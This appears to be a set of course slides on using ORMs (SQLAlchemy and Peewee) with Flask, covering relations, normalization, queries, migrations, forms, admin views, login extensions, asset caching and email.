Construct queries programmatically
Important if a user should be able to e.g. filter or sort records on multiple criteria
"IN" queries are just cumbersome with raw DB API
Access result rows in object-oriented way
There is an impedance mismatch between object-oriented and relational world
Conversion is trivial for integers and strings, but not for relations

Relations ⌘

1:1: don't do this, just put both sides into the same table
If you must (because of physical storage considerations), just use the same primary key and write helpers or joins to retrieve the other side
1:many: add a non-NULL reference field to the "many" side that references the "1" side
ORM will convert this into a maybe-lazily-loaded collection on "1:" side and to the link to the other object on the ":many" side
1:0-1: add a non-NULL unique reference field to the "0-1" side that references the "1" side
many:many: use an intermediate table that has two non-NULL fields that reference both sides
ORM will represent the other side as a collection

Normalization ⌘

Goal: make sure that the very structure of the database makes it impossible to have inconsistent data
If you don't update your data, denormalization may be OK
Traditional theory of relational databases doesn't really accept IDs
Always think "if there is no ID, what else could serve as a key?"
Useful rule of thumb, approximately equivalent to BCNF (also known as 3.5NF):
Each attribute must provide a fact about the key (1NF), the whole key (2NF), and nothing but the key (BCNF).
Both 2NF and 3NF are concerned equally with all candidate keys of a table and not just any one key.
So help me Codd!
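A small illustration of the goal, using the standard sqlite3 module and made-up tables. In the flat table the author's email is a fact about the author, not about the article key, so a partial update leaves the data inconsistent. In the normalized layout the same mistake is structurally impossible:

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Denormalized: author_email is repeated in every article row.
conn.execute("CREATE TABLE article_flat "
             "(id INTEGER PRIMARY KEY, author TEXT, author_email TEXT)")
conn.executemany("INSERT INTO article_flat (author, author_email) VALUES (?, ?)",
                 [("alice", "alice@example.com"), ("alice", "alice@example.com")])
# An update that misses one row leaves two different emails for the same author.
conn.execute("UPDATE article_flat SET author_email = 'new@example.com' WHERE id = 1")
emails_flat = conn.execute(
    "SELECT COUNT(DISTINCT author_email) FROM article_flat "
    "WHERE author = 'alice'").fetchall()[0][0]

# Normalized: the email is stored once, keyed by the author's name (a natural key).
conn.execute("CREATE TABLE author (name TEXT PRIMARY KEY, email TEXT NOT NULL)")
conn.execute("CREATE TABLE article "
             "(id INTEGER PRIMARY KEY, author TEXT NOT NULL REFERENCES author(name))")
conn.execute("INSERT INTO author VALUES ('alice', 'alice@example.com')")
conn.executemany("INSERT INTO article (author) VALUES (?)", [("alice",), ("alice",)])
conn.execute("UPDATE author SET email = 'new@example.com' WHERE name = 'alice'")
emails_normalized = conn.execute(
    "SELECT COUNT(DISTINCT a.email) FROM article "
    "JOIN author a ON a.name = article.author").fetchall()[0][0]
```

Here emails_flat counts the distinct emails recorded for one author in the flat table, and emails_normalized does the same through the join.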

Common ORMs ⌘

SQLAlchemy: the most powerful one
Adopts the Unit of Work pattern
The application sometimes becomes a bit too verbose
Peewee: the lightweight one
Adopts the Active Record pattern
Much easier to learn, but has limitations
There are others but they are not commonly used with Flask

How to learn an ORM ⌘

Describing tables
Migration tools
Selecting by primary key
Selecting by other attributes
Joining tables
Inserting, updating and deleting records
Mass updates and deletes
Data validation
Transactions

Flask-SQLAlchemy: boilerplate ⌘

from flask import Flask
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'
db = SQLAlchemy(app)

# Now use db.Model as a base class for your models
# also db.* contains everything from sqlalchemy and sqlalchemy.orm

How to describe database tables with SQLAlchemy ⌘

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    # ...

class Article(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    text = db.Column(db.Text)
    date = db.Column(db.DateTime)
    author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
    author = db.relationship('User', backref='articles')

SQLAlchemy session ⌘

With SQLAlchemy, you need to construct relationships between objects by setting the attributes that were declared as db.relationship, not by manipulating IDs
The objects stay in the session (db.session)
Newly constructed objects have to be added there first
When you flush the session, the objects are saved to the database and get the IDs
Other database clients will see your records when you commit the transaction
flush != commit. Session flushing and transactions are different concepts

>>> db.create_all()
>>> u = User()
>>> u.id
>>> a = Article()
>>> a.text = 'Something new'
>>> a.author = u
>>> db.session.add(u)
>>> db.session.add(a)
>>> db.session.flush()
>>> u.id
1
>>> a.id
1
>>> a.author_id
1
>>> db.session.commit()
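The difference between flush and commit can also be observed without SQLAlchemy. The sketch below uses plain sqlite3 with two connections as an analogy, not SQLAlchemy itself: sending the INSERT (roughly what a flush does) assigns the ID, but a second client sees the row only after the commit. The file name and variable names are arbitrary:

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.db")
writer = sqlite3.connect(path)
reader = sqlite3.connect(path)
writer.execute("CREATE TABLE user (id INTEGER PRIMARY KEY)")
writer.commit()

def count_users(conn):
    # fetchall() exhausts the cursor, so no read lock is left behind
    return conn.execute("SELECT COUNT(*) FROM user").fetchall()[0][0]

# Comparable to a flush: the INSERT is sent and the ID is assigned...
cur = writer.execute("INSERT INTO user DEFAULT VALUES")
new_id = cur.lastrowid
# ...but the transaction is still open, so the other connection sees nothing.
seen_before_commit = count_users(reader)

# After the commit the row becomes visible to other clients.
writer.commit()
seen_after_commit = count_users(reader)

writer.close()
reader.close()
```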

Querying the database ⌘

>>> # get by id
>>> a = Article.query.get(1)
>>> a.text
'Something new'
>>> # get by something else - note the first() to get only one item instead of a collection
>>> b = Article.query.filter(Article.date == None).first()
>>> b.id
1

Performing joins ⌘

Here is how:

Article.query.join(User).filter(...)

The result is still a collection of Articles
The benefit is that you can filter on User-related conditions
SQLAlchemy will figure out the join condition automatically in most cases

Aggregation ⌘

Counting records: Article.query.filter(...).count()
Getting min, max, sum, ...:

from sqlalchemy.sql import func
db.session.query(func.max(Article.date)).filter(...).scalar()

There are special constructions for grouping, too
It is hard to come up with a query that cannot be expressed using SQLAlchemy
But this is not a course on SQLAlchemy, so please learn these advanced topics yourself when needed

Updating and deleting records ⌘

If you have the record:
Call db.session.delete(record) (or just update its fields as needed), then db.session.flush()
If you want mass-update or mass-delete:
Article.query.filter(...).delete() or .update(...)
This bypasses the session, use with care

Peewee ORM: boilerplate with Flask-Peewee ⌘

from flask import Flask
from flask_peewee.db import Database

app = Flask(__name__)

app.config['DATABASE'] = {
    'name': '/tmp/test.db',
    'engine': 'peewee.SqliteDatabase',
}

db = Database(app)

# Now use db.Model as a base class for your models

Peewee ORM: raw boilerplate ⌘

from flask import Flask
from peewee import *

app = Flask(__name__)
database = SqliteDatabase('/tmp/test.db')

# This hook ensures that a connection is opened to handle any queries
# generated by the request.
@app.before_request
def _db_connect():
    database.connect()

# This hook ensures that the connection is closed when we've finished
# processing the request.
@app.teardown_request
def _db_close(exc):
    if not database.is_closed():
        database.close()

# A common pattern is to create a base model class
# so that all models know that they belong to this database
class BaseModel(Model):
    class Meta:
        database = database

How to describe database tables with Peewee ⌘

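import datetime
from peewee import DateTimeField, ForeignKeyField, TextField

class User(db.Model):
    # With Peewee, id is implicit
    # ...
    pass

class Article(db.Model):
    text = TextField()
    date = DateTimeField(default=datetime.datetime.now)
    # Note: you don't have to describe the column and the relationship separately
    # (newer Peewee releases, 3.x, call this parameter backref instead of related_name)
    author = ForeignKeyField(User, related_name='articles')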

Active Record pattern ⌘

Peewee does not use Unit of Work and does not have a Session
Instead, each model object knows (via Meta) which database it belongs to
To persist it, call .save() on it
Unlike SQLAlchemy, you have to track dependencies manually
By default, an INSERT will be generated if the id is not set, and an UPDATE if id is known
To delete it, call .delete_instance() on it
Don't confuse with .delete which constructs a query which deletes all records matching a condition from the table!
By default, autocommit is True
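To make the pattern concrete, here is a toy Active Record class built on the standard sqlite3 module. It is a hypothetical illustration of the save() / delete_instance() behaviour described above, not Peewee's actual implementation:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, text TEXT)")

class ToyArticle:
    """Hypothetical Active Record-style class: each object saves itself."""

    def __init__(self, text, id=None):
        self.id = id
        self.text = text

    def save(self):
        if self.id is None:
            # No id yet: INSERT and remember the generated key
            cur = conn.execute("INSERT INTO article (text) VALUES (?)", (self.text,))
            self.id = cur.lastrowid
        else:
            # Known id: UPDATE the existing row
            conn.execute("UPDATE article SET text = ? WHERE id = ?",
                         (self.text, self.id))
        conn.commit()  # mimics autocommit

    def delete_instance(self):
        # Deletes only the row that belongs to this object
        conn.execute("DELETE FROM article WHERE id = ?", (self.id,))
        conn.commit()

a = ToyArticle("Something new")
a.save()            # INSERT
a.text = "Edited"
a.save()            # UPDATE
stored = conn.execute("SELECT id, text FROM article").fetchall()
a.delete_instance()
remaining = conn.execute("SELECT COUNT(*) FROM article").fetchall()[0][0]
```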

Querying the database ⌘

>>> # get by id
>>> a = Article.get(id=1)
>>> a.text
'Something new'
>>> # get by something else - note the first() to get only one item instead of a collection
>>> b = Article.select().where(Article.date == None).first()
>>> b.id
1

Joins ⌘

With Peewee, joins are as easy as with SQLAlchemy
And they work exactly the same

Article.select().join(User).where(...)

Aggregation ⌘

Counting records: User.select().count()
Finding minimum or maximum: Article.select(fn.max(Article.date)).where(...).scalar()

Database evolution ⌘

It's a fact that fields and tables are added, removed, or otherwise modified
One can talk about schema migrations and data migrations
You can do it by hand, or by a script (i.e. create a migration)
SQLAlchemy: no built-in support for migrations
Frequently used with Alembic, maybe via Flask-Migrate
Schema migrations are auto-generated, but can be edited
Data migrations are possible but only documented in external blogs
Alternative: SQLAlchemy-migrate
Used e.g. in OpenStack
No Flask extension
Peewee: some built-in schema migrations but no built-in tracking of what has been applied
No clear winner among tracker tools
peewee-db-evolve is an interesting idea: fully automated schema migrations that introspect the current schema and diff it against the models
No Flask extension, and none is needed
Migration tools don't really work with SQLite due to incomplete support for ALTER TABLE
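"Tracking what has been applied" boils down to a bookkeeping table. The following is a minimal hand-rolled sketch with sqlite3. The schema_migration table and the MIGRATIONS list are assumptions made for this example and do not reflect how Alembic or any Peewee tool stores its state:

```python
import sqlite3

# Hypothetical migrations as (version, SQL) pairs; real tools keep them in files.
MIGRATIONS = [
    (1, "CREATE TABLE user (id INTEGER PRIMARY KEY)"),
    (2, "ALTER TABLE user ADD COLUMN email TEXT"),
]

def migrate(conn):
    """Apply every migration not yet recorded; return the versions applied."""
    conn.execute("CREATE TABLE IF NOT EXISTS schema_migration "
                 "(version INTEGER PRIMARY KEY)")
    done = {row[0] for row in conn.execute("SELECT version FROM schema_migration")}
    applied = []
    for version, sql in MIGRATIONS:
        if version in done:
            continue  # already applied on an earlier run
        conn.execute(sql)
        conn.execute("INSERT INTO schema_migration (version) VALUES (?)", (version,))
        conn.commit()
        applied.append(version)
    return applied

conn = sqlite3.connect(":memory:")
first_run = migrate(conn)   # applies both migrations
second_run = migrate(conn)  # nothing left to do
columns = [row[1] for row in conn.execute("PRAGMA table_info(user)")]
```

Adding a column is one of the few ALTER TABLE operations that SQLite does support, which is why the example gets away with it.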

Model-based forms ⌘

Sometimes it is a good idea to base a form on a set of fields from a model, plus or minus some exceptions
The most secure practice is to whitelist fields
For SQLAlchemy models, use WTForms-Alchemy

from wtforms_alchemy import ModelForm
from myproject.myapp.models import User

class UserForm(ModelForm):
    class Meta:
        model = User
        only = ['first_name', 'last_name', 'email']

Peewee support is provided via the wtfpeewee package

from wtfpeewee.orm import model_form
from myproject.myapp.models import User
UserForm = model_form(User, only=('first_name', 'last_name', 'email'))

Admin interface ⌘

Smart idea: create a model_form from each model, and expose via dynamically-generated views
That's what Flask-Admin does
It also has a component for managing files on disk
It's your responsibility to properly restrict access to the admin interface
Boilerplate (without any security):

from flask import Flask
from flask_admin import Admin

from flask_admin.contrib.sqla import ModelView
# or: from flask_admin.contrib.peewee import ModelView

app = Flask(__name__)

admin = Admin(app)

admin.add_view(ModelView(User, db.session))
admin.add_view(ModelView(Article, db.session))
# Peewee: there is no session

For authentication, subclass ModelView and define the is_accessible method, which should return a boolean

Security-related extensions ⌘

Flask-Login
The most basic one
Tracks the currently logged-in user, stores it in the session
Lets you protect some views with the @login_required decorator
You have to implement the login procedure (e.g. the password check against your models) yourself
It's not that difficult, and the result is likely to match your business requirements
Flask-Security
Implements login, registration, password change, password recovery via email
In a way that may or may not be suitable for you - but allows some customization
Follows best practice regarding password storage
Supports both SQLAlchemy and Peewee
Flask-User
Was written because the author had found Flask-Security too difficult to customize
Supports only SQLAlchemy out of the box
There are also packages for the use case where the authentication data is not stored in models
Flask-SimpleLDAP, Flask-LDAP-Login, Flask-CAS, Flask-Social, ...
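The password check that Flask-Login leaves to you could look roughly like this, using only the standard library. It is a sketch under assumptions: the function names are invented, the iteration count is a placeholder to tune, and the salt and digest would be stored in your user model:

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumption; tune to your hardware and current guidance

def hash_password(password, salt=None):
    """Return (salt, digest) suitable for storing in the user record."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, ITERATIONS)
    return salt, digest

def check_password(password, salt, expected_digest):
    """Re-hash the candidate password and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)

# At registration time: store salt and digest, never the password itself
salt, stored = hash_password("correct horse")
```

In the login view, a successful check_password call would be followed by Flask-Login's login_user.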

What's wrong with Flask-Security ⌘

User enumeration vulnerability open since 2015
Insists too much on users having emails
Possible, but non-trivial, to overcome
Implements a policy of sending emails on events like password change
This is configurable via app.config, with the default being on
It would have been better if Flask-Security just provided a signal that it triggers on such events
Possibly implements something else that doesn't match your requirements
Test it thoroughly

How to protect the entire application with login ⌘

Look at how the login_required decorator in Flask-Login works to understand the code below

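from flask import current_app, request
from flask_login import current_user

@app.before_request
def check_valid_login():
    # Let the request through if the user is logged in or the endpoint is public
    login_valid = current_user.is_authenticated
    page_is_public = request.endpoint and request.endpoint in ('static', 'security.login')
    if not (login_valid or page_is_public):
        return current_app.login_manager.unauthorized()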

Optimizing static assets ⌘

Client-side caching is an important loading-time optimization
The client is told to cache all JS and CSS files by setting the Expires: header to point far into the future
Problem: what if the file changes?
Solution: don't reuse the URL
Include some version number in it
See how Flask-Bootstrap does it
Concatenate and minify your JS and CSS files
This avoids issuing multiple requests
Flask-Assets can do it for you
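One way to "not reuse the URL" is to derive the version from the file content. The helper below is a hypothetical sketch of that idea, not necessarily what Flask-Bootstrap or Flask-Assets do internally:

```python
import hashlib

def versioned_url(url_path, content):
    """Append a short content hash so the URL changes whenever the file does."""
    digest = hashlib.sha256(content).hexdigest()[:8]
    return "%s?v=%s" % (url_path, digest)

# Same path, different content: the browser sees two distinct URLs
old = versioned_url("/static/app.js", b"console.log(1);")
new = versioned_url("/static/app.js", b"console.log(2);")
```

Because the URL changes only when the content does, the far-future Expires: header stays safe.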

Sending email ⌘

Of course, you can use the email and smtplib modules manually
But then some common tasks arise
Central configuration of SMTP server credentials
Suppressing emails centrally during unit tests or on developers' machines
Solution: Flask-Mail
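For comparison, this is roughly what the manual approach looks like once central configuration and suppression are bolted on. MAIL_CONFIG, outbox and send_mail are names invented for this sketch:

```python
import smtplib
from email.message import EmailMessage

# Hypothetical central configuration; in Flask this would live in app.config
MAIL_CONFIG = {"host": "localhost", "port": 25, "suppress": True}
outbox = []  # suppressed messages are collected here for inspection in tests

def send_mail(sender, recipient, subject, body, config=MAIL_CONFIG):
    """Build a message and either send it via SMTP or store it in the outbox."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    if config["suppress"]:
        # Unit tests and developers' machines: never touch the network
        outbox.append(msg)
        return msg
    with smtplib.SMTP(config["host"], config["port"]) as smtp:
        smtp.send_message(msg)
    return msg

send_mail("noreply@example.com", "user@example.com", "Welcome", "Hello!")
```

Flask-Mail packages the same two concerns, so you do not have to maintain this glue code yourself.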

Further reading ⌘

Flask documentation
SQLAlchemy documentation
WTForms documentation
Flask mailing list
Google is your friend